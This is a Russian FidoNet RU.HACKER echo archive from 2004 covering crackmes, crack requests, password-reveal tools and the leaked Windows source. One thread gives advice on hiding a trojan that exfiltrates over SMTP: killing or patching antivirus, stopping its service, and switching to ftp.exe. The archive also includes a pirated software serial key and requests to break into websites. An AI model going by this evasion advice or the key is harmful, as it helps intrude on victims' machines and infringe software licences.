Piskov 27-Feb-04 00:05:14 2:463/573.532 To : Ivan Ushakov 2:5004/57.26 Subj : Облом =====================================================================RU.HACKER= О Ivan! Откуда ты взялся? 24 фев 04 23:05, you wrote to Dmitriy Gerasimov: DG>> Самое простое решение: при внедрение трояна в систему антивири DG>> прибиваются, потом омдифицируются "под свои нужды" и запускаются DG>> опять. Hу или если влом патчить антивирусы, то просто особо DG>> назойливиые их компоненты во время совершения противоправных DG>> дейсвтий убивается. А на такбар вешается фальшивая иконка. IU> Такое возможно только если пользователь сидит из под администратора(во IU> всяком случае DrWeb это севрис,а его как раньше не убьешь), что IU> говорит о его уровне. Для такого пользователя не нужно особо усложнять IU> троян. По поводу вышесказанного: если на машине фаервол с функцией IU> контроля за приложениями, работающими с сетью, то смысла IU> заморачиваться с протоколами тоже нет. Ivan Компьютер обыкновеннейший. Win2K || XP, точно не знаю. Hикаких проблемм с запуском от администратора не будет. Главное было для меня хорошо спрятаться в системе, чтобы не выдавать себя никак. Ivan? Куда он делся... --- * Origin: Think different! (c) Apple inc. (2:463/573.532) = Здесь обитают хакеры ====================================================New= Msg : 9015 [1-10330] K/s From : Gennadiy Doroshenko 27-Feb-04 02:52:40 2:5030/1900.237 To : All Subj : Polyphonic Wizard =====================================================================RU.HACKER= * Копия из : $CRACK$.TALKS Hi *All*! Может не по адpесу, но... Разыскивается лекаpство от тpиальности. Always yours Gennadiy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Пеpеспать - ещё не повод для знакомства=- (2:5030/1900.237) = Здесь обитают хакеры ====================================================New= Msg : 9016 [1-10330] K/s From : Evgeni Asoskov 27-Feb-04 09:58:40 2:5027/16.14 To : Vladimir Kochnev 2:5020/829.610 Subj : Re: CrackMe =====================================================================RU.HACKER= Привет Vladimir! Отвечаю на ваше письмо от 26.02.04, тогда писал(а) Vladimir Kochnev к Evgeni Asoskov, а было тогда на часах 20:15:08. VK> да ну, не прет меня разбираться с этим крякмисом :(( уроцкий батскрипт. VK> лучше бы ты скомпилил его на сях, бинарник и то интереснее рыть. Hе нравится - не разбирайся. Я насильно не заставляю. По поводу уродливости. Hаписать тебе тоже самое но на мамсе и форте? Вот там, на первый взгляд, все выглядит еще более уродливо... ;) VK> а кейген можно сделать из самого крякмиса: прибить в нужном месте echo VK> %varXX% и оно выведется. :) только вот вапрос где? Hе выведется. Алгорим проверки валидности пароля не позволит :) А для написания кейгена надо в батник дописать примерно 20 строчек. Можешь хотя бы озвучить название алгоритма, по которому данные преобразуются? Всего хорошего, Evgeni. --- Будете пpоходить мимо - так пpоходите... * Origin: Hе к чему пpикопаться? Пpикопайся к оpиджину :) (2:5027/16.14) = Здесь обитают хакеры ====================================================New= Msg : 9017 [1-10330] K/s From : Igor Shishkin 27-Feb-04 12:26:44 2:5049/33 To : Gennadiy Doroshenko 2:5030/1900.237 Subj : Polyphonic Wizard =====================================================================RU.HACKER= Вас приветствую, Gennadiy ! 27 февраля 2004, Gennadiy Doroshenko writes to All: GD> Может не по адpесу, но... GD> Разыскивается лекаpство от тpиальности. Дык, то же самое. Если найдёшь - свистни;) Желаю здравия и благополучия ════════════════════════ Игорь --- --- * Origin: Y o g a (2:5049/33) = Здесь обитают хакеры ====================================================New= Msg : 9018 [1-10330] K/s From : Alexey Sveshnikov 27-Feb-04 16:29:30 2:5030/1900.44 To : Sergey Cherkasov 2:5022/40.14 Subj : PAK =====================================================================RU.HACKER= Hello Sergey. SC> Есть парольный архив PAK, может подскажите как его сломать? скорей всего, придется писать ломалку самому или бросить эту затею :) Alexey --- GoldED+/LNX 1.1.5 on linux 2.4.20-8smp * Origin: :: same red eyes we alike :: (2:5030/1900.44) = Здесь обитают хакеры ====================================================New= Msg : 9019 [1-10330] K/s From : JokeR[FHC] 27-Feb-04 04:59:06 2:5030/1157.10 To : All Subj : crackme =====================================================================RU.HACKER= Вопросик возник при изучения кода. Интересна коеструкция "goto :label13". Переход на метку осущ. по имени, а след-но, это нифего на переход.. --- goto :label13 --- Я дурак? Solovev Evgeny uin: 127999 --- * Origin: Америка - это красиво, но Россия - вот, где есть си (2:5030/1157.10) = Здесь обитают хакеры ====================================================New= Msg : 9020 [1-10330] From : Ivan Ushakov 28-Feb-04 23:12:06 2:5004/57.26 To : JokeR[FHC] 2:5030/1157.10 Subj : crackme =====================================================================RU.HACKER= Hello JokeR[FHC]. Пятница Февраль 27 2004 04:59, you wrote to all: JF> Вопросик возник при изучения кода. JF> Интересна коеструкция "goto :label13". JF> Переход на метку осущ. по имени, а след-но, это нифего на переход.. JF> --- JF> goto JF> :label13 JF> --- JF> Я дурак? goto label11 :lable13 Все правильно. двоеточие и имя - это метка. Вообще при изучении данного скрипта очень помогает /? в командной строке. А по поводу самого crackme то я бросил в нем копатся ибо для написания кейгена необходимо написать код, совершающий обратное действие: из хеша username получаем необходимый пароль. А там столько математики(взять хотябы "процедуру" label4: мне, например, неясно как там по числу получить последовательность индексов символов(совершить обратное этой процедуре действие)). Про label6 и label5 я вообще тихо молчу ибо там обратный ход вообще непонятен. Единственный(для меня) вариант - скопировать блоки label4,label6,label5 и написать брутфорс, который и подыщет такой пароль, чтобы при прохождении вышеупомянутых трех "процедур" он давал хеш равный ранее полученному хешу username. Хотя, возможно я недопонял скрипт. 2автор: а вставка echo %% действительно ничего не даст. Грамотный ход :) Ivan ... [SMD clan][IDM][Ambient][i_DnB] --- GoldED+/W32 1.1.5-20020105 * Origin: under construction (2:5004/57.26) = Здесь обитают хакеры ====================================================New= Msg : 9021 [1-10330] From : Perov Andrey 28-Feb-04 23:23:33 2:467/126.999 To : All Subj : Win XP =====================================================================RU.HACKER= Heil All! Какие трояны работают в сабже? Типа пока All! --- GoldED+/W32 1.1.5-20020104 * Origin: ..SkiP.. (2:467/126.999) = Здесь обитают хакеры ====================================================New= Msg : 9022 [1-10330] K/s From : Moderator of RU.HACKER 28-Feb-04 06:02:23 2:5020/1683 To : Gennadiy Doroshenko 2:5030/1900.237 Subj : Re: Polyphonic Wizard =====================================================================RU.HACKER= Привет Тебе, О Gennadiy! Смотpю я как-то в пеpископ в Пят Фев 27 2004 в 02:52 и вижу, как Gennadiy Doroshenko передает All GD> Может не по адpесу, но... GD> Разыскивается лекаpство от тpиальности. 2:5030/1900.237 [+] - Поиск кряков. Offtopic. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Зажигалка Zippo, огнетушитель UnZippo... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9023 [1-10330] K/s From : Moderator of RU.HACKER 28-Feb-04 06:03:16 2:5020/1683 To : Igor Shishkin 2:5049/33 Subj : Re: Polyphonic Wizard =====================================================================RU.HACKER= Привет Тебе, О Igor! Смотpю я как-то в пеpископ в Пят Фев 27 2004 в 12:26 и вижу, как Igor Shishkin передает Gennadiy Doroshenko IS> Дык, то же самое. Если найдёшь - свистни;) 2:5049/33 [+] - Письмо типа `И мне!`. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: До пенсии далеко, а pазвлекаться надо (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9024 [1-10330] From : Garaev Ildar 27-Feb-04 16:19:35 2:5085/1.47 To : Vladimir Kochnev 2:5020/829.610 Subj : w32dsm =====================================================================RU.HACKER= Приветствую Вас Товарищ, Vladimir! GI>> Спасибо. VK> а что именно сказал PEiD ?? у тебя версия 0.91 ?? Версия да таже. Сказал что Borland C++ 1999 Encryption 00001000 File offset 00000600 Linker 5.0 Ep section .text First bytes EB,10,66,62 Subsystem Win32 GUI --- * Origin: :) (2:5085/1.47) = Здесь обитают хакеры ====================================================New= Msg : 9025 [1-10330] From : Vova Penkin 28-Feb-04 15:04:56 2:5061/6.92 To : Aleksey Sazonov 2:5020/3204.2 Subj : Как ломанyть сайт =====================================================================RU.HACKER= Пpивет Aleksey! 22 Янв 04 01:15, Aleksey Sazonov -> Denis Tsibulsky: DT> Hаpод, есть ли такая пpогpамка, котоpая бы вытвоpяла сабж? В DT> частности, хотелось бы, чтобы она yмела ломать паpоль на boom.ru DT> и narod.ru я так понял что ломать это бpyтфоpсить? дyмаешь администpация этого не заметит? да на них ежедневно ходят с DOS'aми а ты говоpишь ломат Vova ... NiL(now i like):Демки с Lexer --- CHAINIK v.3.11 * Origin: << Hапомните мне его сделать >> (2:5061/6.92) = Здесь обитают хакеры ====================================================New= Msg : 9026 [1-10330] From : Dmitry Yatsenko 29-Feb-04 22:25:51 2:464/97.333 To : All Subj : Showpass =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, All?!_ Есть такая программка, которая вместо звёздочек (*****) пароля показывает сам пароль. Так вот, под ХР она не работает. /*Вопрос:*/ Есть ли такая же, но под ХР? Или, например, новая версия под ХР? Вот я и всё сказал тебе, *All*. WBR, /Angorec/ /@np: [WinAmp] Nonamerz & U.G. - Игpы патpиотов/ --- Спирт употребляется по прямому назначению - для протирки клавиатуры * Origin: Вы не любите кошек? Вы просто не умеете их готовить.. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9027 [1-10330] K/s From : Danila Peroff 29-Feb-04 19:17:47 2:5026/61.45 To : Evgeni Asoskov 2:5027/16.14 Subj : CrackMe =====================================================================RU.HACKER= Привет, Evgeni! Мои бортовые системы запеленговали, что в Четверг Февраль 19 2004 17:59, Evgeni Asoskov писАл All EA> Почти месяц прошел. Hеужели никто так и не разобрался к кракми, EA> посланным в эху 25 января? Или он никому не интересен? Hе знаю, как All'у, но мне вообще все нетривиальные вещи, написанные на BAT'е (крякми, вири и т. д.), очень интересны. Просто сначала времени его поковырять не было, а потом просто забыл : Итак, кейген (на BAT'e): ─── Тут начинается файл keygen.uue ─── section 1 of file keygen.rar < uuencode by Dos Navigator > begin 644 keygen.rar M4F%R(1H'`&^76=E;BYB872G&$`'U9S<,3#0#@>&WE_]!,#73G"T MH)>(M+^V M&0;.I1%(K^,36:<3.?Q*3Y65&#H&B<\RG]M#29\>MY+Q*TJ]>!-,U!]U-?VV M!Y.ME"UP6+2!UKS@NVEH9F3;WG1RH-#/0,G8U'[B9296VF^VL\QN2:QP@`\>R)11KK@D2_B@QZ!J MSYAZBQD2)J^'P+SK$`QU*'/[VIEZ^"31%-:6I.G8\J$3(>"$'*4S-@U M@22O`.3!_(A.4%L`7#-JJUL16WXK!7B5"YYVM?8P[[N=8F[#NO!_C<+F@(UK M`7*\FS!NPF_:E2FEO0%NL0D:]OH@6';-%Q[^O_NLJ:L["7N"CZ5QRF1 MAK8D$@;Q6#\O`MX:CS]S%3LU3*ZK18.T0P&%@"*:`.J;L6 M/@0B-$'_+!P*#5^R/1_ZSI12A:93_%,ZB]>=5J*%5SU,KV*SZO3W(.U):H(Q MJS>/#A4]W'K*XHSMC>TOY<$=Q_EFR53G2.F.1]-8,751R)APM=07`Z++AUQ?,<-JMV@D M]5S:`E!'LPP<@(L4Q#3E2(U2IF<8#5FHZ;65/'\$CU(D@\;I@^^>3I!G(&X$ MW')7Y[.#E:3A9HPY"72S'9.L3\JC?0"7@#:W7V`#5R=%[V'0>^I>L>=;@*,+ M:MGW[!B__RI9(\?X"]=33&<:&,RC713\+=BLX-JYF9WM?;9WC.,G8BYI.-Y, M.U`!YA__[8D:(==^?94-K\;/B@HYHLQ577S"3KDKU/P@'Z$CLK@13RD#J;J# M7;4XMNM6-%)6V)+H>XW(-?_!;;.(""B.7R[2$;!MWJU;`/-E=,$5B1G+?-OM M*+-W8]>?9?)6';,/M%S?-ZIZ`!-DZ,DFK5>3-TQ`@/T'^-<&3?B@H/"OK.FJ)F__L/\MIA0K7[T!@L M:Q]EGQD-WB@-/T'\N._@+R8YYJ/<_[9>&68YQRT(PG<%KE_!QSP9VH=XJ0&[ M>7X-"44Z[3W6C]K<``"_B&?VJ?_4LB!Z`,`V``0$```$!````M*]L-3/EETP M'3`"``````!24E!R;W1E8W0K`@````(`````````N29?75)A2\2M*O7@33-0?=37]M@>3K90M<%BT@=:\ MX+MI:&9DV]YT@:L^8>HL9$B:OA\') M<:V#J)G91*$)4^:K_-5RKFBXD13\AK2)T:P$VS:D883H!_30CZSS5-VZUM-L MJH7B\ZQ`,=2AS^]J9>O@DT136EJ3IV/*A$R'@A!RE,S8-8$DKP#DP?R(3E!; M`%PS:JM;$5M^*P5XE0N>=K7V,.^[G6)NP[KP?XW"YH"-:P%RO)LP;L)OVI4I MI;T!;K$)&O;Z(%G.AXGAVS1<>_K_[K*FK.PE[@H^E<&H\_S@Y6DX6:, M.0ETLQV3K$_*HWT`EX`VMU]@`U]AT'OJ7K'G6X"C"VK9]^P8O_\J62/' M^`O74TQG&AC,HUT4_"W8K.#:N9F=[7VV=XSC)V(N:3C>3#M0`>8?_^V)&B'7 M?GV5#:_&SXH*.:+,55U\PDZY*]3\(!^A([*X$4\I`ZFZ@UVU.+;K5C125MB2 MZ'N-R#7_P6VSB`@HCE\NTA&P;=ZM6P#S973!%8D9RWS;[2BS=V/7GV7R5AVS M#[1J>@'-6?P$H%[,*/;QAG'*QR4]:FBOR]@,O805&^X/`^EW@39.C))J MU7DS=,0(#]!_C7!DWXH*#PKZSIJB9O_[#_+:84*U^]`8+&L?99\9#=XH#3]! M_+COX"\F.>:CW/^V7AEF.<*D!NWE^#0E%.NT]UH_: >W```OXAG]JG_U`````````````````#$/7L`0`<` ` end sum -r/size 63103/2921 section (from "begin" to "end") sum -r/size 7849/2100 entire input file ─── А здесь keygen.uue кончается ─── ::: Dan Peroff. ::: ... Быть на этом пути - наша судьба... (c) DDT --- np: No more noise just silence and the music that's in my brain... * Origin: And the beat goes on! (2:5026/61.45) = Здесь обитают хакеры ====================================================New= Msg : 9028 [1-10330] K/s From : Renat Khaliullin 29-Feb-04 22:03:09 2:5084/30.34 To : All Subj : Исходники Windows =====================================================================RU.HACKER= Приветствую тебя, All! Слышал, у Microsoft украли сабж. Hикто не видел ссылки на сабж в Интернете? ║▐│║▐║▌│║▐│║ Всего доброго! ║▐│║▐║▌│║▐│║ 2║5084║30║34║> Renat --- Золото Партии (в слитках по 301 г) * Origin: Night Zone Station (FidoNet 2:5084/30.34) = Здесь обитают хакеры ====================================================New= Msg : 9029 [1-10330] K/s From : Moderator of RU.HACKER 01-Mar-04 00:06:03 2:5020/1683 To : All Subj : Награды в студию! =====================================================================RU.HACKER= Hаpyшители спокойствия в RU.HACKER от 1/03/2004 ──────────────────────────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5026/15.0 │Alexandr Strelnikov │[+][+] │ 11/07/2004│ │ │ 2│ 2:5054/74.22 │Sergey Rakin │[+] │ 11/04/2004│ │ │ 3│ 2:5010/285.0 │Anton Mehler │[+] │ 12/04/2004│ │ │ 4│ 2:5023/42.45 │Podolin Alexey │[+] │ 15/04/2004│ │ │ 5│ 2:5004/95.8 │Igor Viktorov │[*][*] │ 18/03/2004│ │ │ 6│ 2:5012/2.328 │Pavel Uwarov │[+][*] │ 18/05/2004│ │ │ 7│ 2:5009/5.26 │Kopytov Dmitry │[*][*] │ 18/03/2004│ │ │ 8│ 2:5030/2405.99 │Vsevolod Eroskin │[+] │ 27/04/2004│ │ │ 9│ 2:5036/1.0 │Oleg │[+] │ 2/05/2004│ │ │ 10│ 2:6045/5.0 │Roman Sabanin │[+] │ 8/05/2004│ │ │ 11│ 2:5069/14.37 │Vladislav Bugaev │[*] │ 8/03/2004│ │ │ 12│ 2:5030/49.35 │Sergey Smirnov │[+] │ 9/05/2004│ │ │ 13│ 2:5032/25.3 │Anton Martchukov │[+] │ 9/05/2004│ │ │ 14│ 2:5030/1900.237 │Gennadiy Doroshenko │[+] │ 28/05/2004│ │ │ 15│ 2:5049/33.0 │Igor Shishkin │[+] │ 28/05/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ Снятие нагpад (по RU.HACKER) ──────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5042/12.12 │Nickolay Karavanov │[*] │ 5/02/2004│ │ │ 2│ 2:5069/14.50 │Sergey Medintsev │[*] │ 5/02/2004│ │ │ 3│ 2:5020/829.610 │Vladimir Kochnev │[*] │ 8/02/2004│ │ │ 4│ 2:5009/5.10 │Dmitry Sidorov │[*] │ 8/02/2004│ │ │ 5│ 2:5079/67.21 │Vladimir Goncharenco │[*] │ 18/02/2004│ │ │ 6│ 2:5012/2.305 │Dmitriy Lykerianov │[*] │ 18/02/2004│ │ │ 7│ 2:5077/16.35 │Vladimir V. Kamarzin │[*] │ 19/02/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ --- NetMgr 1.0y+ * Origin: NetManager of The X Files BBS (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9030 [1-10330] From : Konstantin Reus 27-Feb-04 14:52:38 2:5031/52.10 To : All Subj : SoftIce =====================================================================RU.HACKER= Сабж при bpx hmemcpy пишет "symbol not defined (hmemcpy)". Что это такое и как фиксить? np: Аpия - Улица Роз [paused] --- WinNT Uptime: 0 day(s), 15 hour(s), 10 min. * Origin: FIDO создал гомосексуалист, а погубили п#дорасы (2:5031/52.10) = Здесь обитают хакеры ====================================================New= Msg : 9031 [1-10330] From : Yuriy Sharnenkov 01-Mar-04 03:59:18 2:5053/40.54 To : Renat Khaliullin 2:5084/30.34 Subj : Исходники Windows =====================================================================RU.HACKER= [√] Привет, как жизнь, Renat ? 29 Февраля 2004 года ты писал(а) к All: RK> Слышал, у Microsoft украли сабж. Hикто не видел ссылки на сабж в RK> Интернете? на cyberinfo.ru в ссылках было, когда я смотрел их ещё можно было утянуть, это было пару суток назад [√] Пока, Renat, счастливого тебе коннекта ! ... --- GoldED+/W32 snapshot-2001.02.24, FastFTN v1.55 * Origin: File not found. Nobody leaves the room! (2:5053/40.54) = Здесь обитают хакеры ====================================================New= Msg : 9032 [1-10330] K/s From : Evgeny Kostin 01-Mar-04 07:33:07 2:5027/12.56 To : Vova Penkin 2:5061/6.92 Subj : Re: Как ломанyть сайт =====================================================================RU.HACKER= VP> Пpивет Aleksey! VP> 22 ssнв 04 01:15, Aleksey Sazonov -> Denis Tsibulsky: DT>> Hаpоae, естue ли такая пpогpамка, котоpая бы вытвоpяла сабж? В частности, DT>> хотелосue бы, чтобы она yмела ломатue паpолue на boom.ru и narod.ru VP> я так понял что ломатue это бpyтфоpситue? aeyмаешue аaeминистpаoeия VP> этого не VP> заметит? aeа на них ежеaeневно хоaeят с DOS'aми а ты говоpишue ломатue VP> Vova VP> ... NiL(now i like):Aeемки с Lexer VP> -+- CHAINIK v.3.11 VP> @ ORIGINAL: << Hапомните мне его сaeелатue >> (2:5061/6.92) Привет нароae! Оч. наaeо сломатue сайт study.orn.ru ( aeело чести) Помоги плиzzzzz Kostin Evgeny aka The_Best --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5027/12.56) = Здесь обитают хакеры ====================================================New= Msg : 9033 [1-10330] K/s From : Evgeny Kostin 01-Mar-04 07:36:17 2:5027/12.56 To : Dmitry Yatsenko 2:464/97.333 Subj : Re: Showpass =====================================================================RU.HACKER= DY> _Приветик! Как aeелишки, как aeетишки, All?!_ DY> Естue такая программка, которая вместо звёзaeочек (*****) пароля DY> показывает сам паролue. Так вот, поae ХР она не работает. /*Вопрос:*/ DY> Естue ли такая же, но поae ХР? Или, например, новая версия поae ХР? DY> Вот я и всё сказал тебе, *All*. WBR, /Angorec/ /@np: [WinAmp] Nonamerz & DY> U.G. - Игpы патpиотов/ DY> -+- Спирт употребляется по прямому назначению - aeля протирки клавиатуры DY> @ ORIGINAL: Вы не любите кошек? Вы просто не умеете их готовитue.. DY> @ ORIGINAL: (2:464/97.333) Привет Dmitry! У меня гaeе-то валяласue прога такой же направленности, толueко она пароли напрямую не показывала а сожраняла в логах. Так вон она поae ХР пашет ... --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5027/12.56) = Здесь обитают хакеры ====================================================New= Msg : 9034 [1-10330] From : Maxim Gorshkow 01-Mar-04 10:41:55 2:5036/55.9 To : Dmitry Yatsenko 2:464/97.333 Subj : Showpass =====================================================================RU.HACKER= IKoln aka Max приветствует тебя /Dmitry!/ 29 февраля 2004 22:25, Dmitry Yatsenko пис " All: DY> Есть такая программка, которая вместо звёздочек (*****) пароля DY> показывает сам пароль. Так вот, под ХР она не работает. DY> /*Вопрос:*/ Есть ли такая же, но под ХР? Или, например, новая DY> версия под ХР? http://www.iopus.com это их сайт а сама прога зовётся iOpus Password Recovery XP REP5P8W2P6U1h-ключь к ней! Пока, пиши не забывай /Dmitry!/ /*np: Linkin park - 02 Deep dive*/ [*Team RST*][ Roy Jones rulezzzz][*Ikoln Station work*][www.realchat.ru] ========================box:ikoln@mail.ru============================== --- * Origin: ..SkiP.. (2:5036/55.9) = Здесь обитают хакеры ====================================================New= Msg : 9035 [1-10330] From : cr0aker 21-Feb-04 14:00:16 2:5011/12.26 To : Alexander Veprik 2:461/613 Subj : Защита файлов =====================================================================RU.HACKER= _Как дела_, Alexander?! *** Писал как-то Alexander Veprik к cr0aker. ca>> всмысле сам себя не pаспакyет. :) AV> Hy, после замены одного байта в UPX-инах UPX тоже становится необpатимым. AV> В смысле он встpоенным pаспаковщиком pаскpывается (для запyска), а самим AV> паковщиком говоpит "не могy pаспаковать". :) "чистота эксперимента" при этом нарушается. :) BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9036 [1-10330] K/s From : Evgeny Kostin 01-Mar-04 20:47:38 2:5027/12.56 To : All Subj : Slobo? =====================================================================RU.HACKER= Всем прива! Hароae, кому не слабо сломатue сайт study.orn.ru. Вроdе dырявый dо смерти но что-то там не так ... не ломается не поd каким преdлогом ... Евгений. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: WinPoint 95 (2:5027/12.56) = Здесь обитают хакеры ====================================================New= Msg : 9037 [1-10330] From : Daniil Uspensky 29-Feb-04 11:21:31 2:5030/1551.7 To : All Subj : Win98 =====================================================================RU.HACKER= Что можно сделать с сабжем, зная фиксированный IP адрес? Хотелось бы почитать содержимое винта... --- Gnus/5.110002 (No Gnus v0.2) Emacs/21.3 (gnu/linux) * Origin: (2:5030/1551.7) = Здесь обитают хакеры ====================================================New= Msg : 9038 [1-10330] From : Vladimir Kochnev 01-Mar-04 20:13:05 2:5020/829.610 To : Konstantin Reus 2:5031/52.10 Subj : SoftIce =====================================================================RU.HACKER= #include __ *char* _To_[256]="Konstantin";*int* _main()_{ cout /< Сабж при bpx hmemcpy пишет "symbol not defined (hmemcpy)". KR> Что это такое и как фиксить? в XP етъ hmemcpy } /* *·:[* Vladimir Kochnev [AHTeam.org]·[RE]·[bioworm.narod.ru]·[Аpхангельск] *]:·* --- [ np: WinAmp is DEAD ] * Origin: // AHTeam site _www.ahteam.org_ */ (2:5020/829.610) = Здесь обитают хакеры ====================================================New= Msg : 9039 [1-10330] K/s From : Dmitriy Gerasimov 29-Feb-04 02:09:26 2:5000/250.666 To : Ivan Ushakov 2:5004/57.26 Subj : Облом =====================================================================RU.HACKER= _/*Hекто Ivan Ushakov сказал "А". Я же скажу "Ху"*/_ TP>>> Hедавно для определенных целей писал троян, который получал TP>>> комманды через pop3, и через smtp отылал результат. Столкнулся TP>>> вот с такой проблеммой. Если на машине стоит Dr. Web, с которым TP>>> идет его Spider, то эта гадина показывает в таскбаре, что уходит TP>>> письмецо, а если он еще и не регестрированный, то выдает TP>>> сообщение, о том что версия нерегистрированная. TP>>> Я так понял что этот спайдер мониторит все исходящие соединения TP>>> на 25 порт. Можно как-то не дать ей это сделать? Можно ли как-то TP>>> проверить установлен ли на жертве этот антивирус? DG>> Самое простое решение: при внедрение трояна в систему антивири DG>> прибиваются, потом омдифицируются "под свои нужды" и запускаются DG>> опять. Hу или если влом патчить антивирусы, то просто особо DG>> назойливиые их компоненты во время совершения противоправных DG>> дейсвтий убивается. А на такбар вешается фальшивая иконка. IU> Такое возможно только если пользователь сидит из под администратора(во IU> всяком случае DrWeb это севрис,а его как раньше не убьешь), Сервисы останавливаются с правами админа NET STOP ИмяСервиса. IU> что говорит о его уровне. Для такого пользователя не нужно особо IU> усложнять троян. Получить Администратора в винде не сильно сложно. Благо как локальных, таки и удалённых дыр в ней хватает. IU> По поводу вышесказанного: если на машине фаервол с функцией IU> контроля за приложениями, работающими с сетью, то смысла IU> заморачиваться с протоколами тоже нет. Есть. Тот же Спайдер письма палит. Между прочим, реализация FTP-протокола гораздо более проста, чем smtp. Её и реализовывать-то необязательно, ftp.exe всегда под боком. Таким образом, код весит меньше и меньше палится. ... ["Квенна" - звезда ролевого бард-рока] [Басты - сила! Гару - Мешки с блохам --- Читая мои месаги, вы тратите УЙМУ своего драгоценного времени. Дуааа! * Origin: Ориджинами пользуются только кретины. (2:5000/250.666) = Здесь обитают хакеры ====================================================New= Msg : 9040 [1-10330] From : Albert Einstein 01-Mar-04 21:00:39 2:4624/8.204 To : Evgeny Kostin 2:5027/12.56 Subj : Re: Showpass =====================================================================RU.HACKER= 01 маpта 04 Evgeny Kostin написал Dmitry Yatsenko в тему Re: Showpass DY>> Естue такая пpогpаммка, котоpая вместо звёзaeочек (*****) паpоля DY>> показывает сам паpолue. Так вот, поae ХР она не pаботает. DY>> /*Вопpос:*/ Естue ли такая же, но поae ХР? Или, напpимеp, новая DY>> веpсия поae ХР? Есть. Таки и зовут "Open Pass XP". Hо тут одно HО: Если паpоль хpанится в текстовом поле за * то его и эта и дpугая пpога вытянет, а если он в адpесном пpостpанстве, а в текст боксе изначально *, то уж извини, ничто кpоме отладчика тебе не поможет (яpкий пpимеp: в окне установки соединения с Инетом. Тот паpоль на самом деле в АП, а в текст боксе тока точки, и ничего больше...) С наилучшими пожеланиями, Albert Einstein [Einstein Software] (mailto: enstain@so.yandex.ru, URL: www.enstain.da.ru, FIDO: 2:4624/8.204) --- FIPS/Phoenix * Origin: Imagination is more important than knoweledge! (2:4624/8.204) = Здесь обитают хакеры ====================================================New= Msg : 9041 [1-10330] K/s From : Evgeni Asoskov 01-Mar-04 20:40:31 2:5027/16.14 To : Danila Peroff 2:5004/57.26 Subj : Re: crackme =====================================================================RU.HACKER= Привет Danila! Отвечаю на ваше письмо от 28.02.04, тогда писал(а) Ivan Ushakov к JokeR[FHC], а было тогда на часах 23:12:06. В связи, с тем, что появился уже реально работающий кейген, шлю "авторскую" версию кейгена. С нормальными именами меток, переменных и своими краткими коментариями, так сказать для "поделиться опытом" ;-) begin 644 KEYGEN.RAR M4F%R(1H'`,^09";6UF4?!R9-@-S6!N0W\3U9#$@0FTAM.2!M,T>UB"#:29=]ZDFV M-E;,S=K?V50TK[=WV[Y?Q7>^,=OZ\OX=KE\OBM-=FLQQK*_0:9$Y&*EARJE4BS%91E=AS:M6T3XI<=1(E=O;#- MJJ"ES)ND[.=J$SIA,8Z-#)Y'=@7!/1Y$6U^&Q[M3NS+,:-#WM?NHT1/SZRZ^ M5\(V/$/.[_>,4RM/S(@X6>#]MV=_2V9AW4`*&UO\O9_7V[.U0H^[^U+;W-W^_Y^_>_Q^,0T:%*]14BS+!$V.!)-*I7M M$Y*URW!P,5E6:N.0-)A?KOFHO%/BM,V22H<#CGGHQ M[WH@T+WJ@W63U-TKK_*>*'!$,X MF72U=?VZ$]"+K:NX36WB94N9=W0C1I$4IWFNT_C,RM"6!\$CG2(6CV";>V2? M0W)](F]1W;90U=J?*;2!<,J"EV9U77W(-S)*B0\$]S-79VP/GC_Z*5&AZ^IT<;O][MP*+3?%J^%,0 M#IL)C8O=G25-5)FQ6LMX-,<5ZK*9IHF\='2T-&I?R5"N`Q7(T2IXAB MYG8OX(!C;M)'UP,'QDN'!NF"T"A^>MO%%*T:V_K*+!;BKL\YA;M&WV;]TX^! MKP>B#0":E].48WZR7%84JC<8"!@V*`@**+;D(SSGM4E'=W'181W55#=VM8[\ M'"Y,?)D'^-"/"%6'!7X"/]"'X-$'_U`Z_8<#<"AV)W_!(?O,&@T),@UBOI2# M6M!I(-=(-.@U)<-Q7@]AS-NKV'DHS@'!H(F^9$TP@D+Z!^5AFYI?.T<#_2G[ MLG;?NNK79MUFW\MP5`IDM$5XB.()3)4Z-^QT&`,7V+$D?36U;;U7U%X$T3>N MXZY[@&!0E+NVT!O[/4#NET7WKMWKH[E&Z[M2+]'!G'BQXI4AJ!Q;P)T:!/GM M0^=#C=+KCO@JH]JWF#)GZ>G<8N(<^ID((T"9H/*D[(,;8&I':R(7]0.\.(-7 MF`@4`_51I-N&^MD3V4"8WV:^UL7/K]@A;7+:EQ$W<_`5>>`'D.A?9#)L-U?B MX"9X'O/P8#EYLOSM>3S/FA^JWD]K8_!_/H^IZ56=-^NE3"4UCC"58^-U;HW< M2J;*%[0CHQA(Q_^L:'H[N:P8U^)$_NIA'HQ/3%;,?!2HC1QJM/DO3N@30, 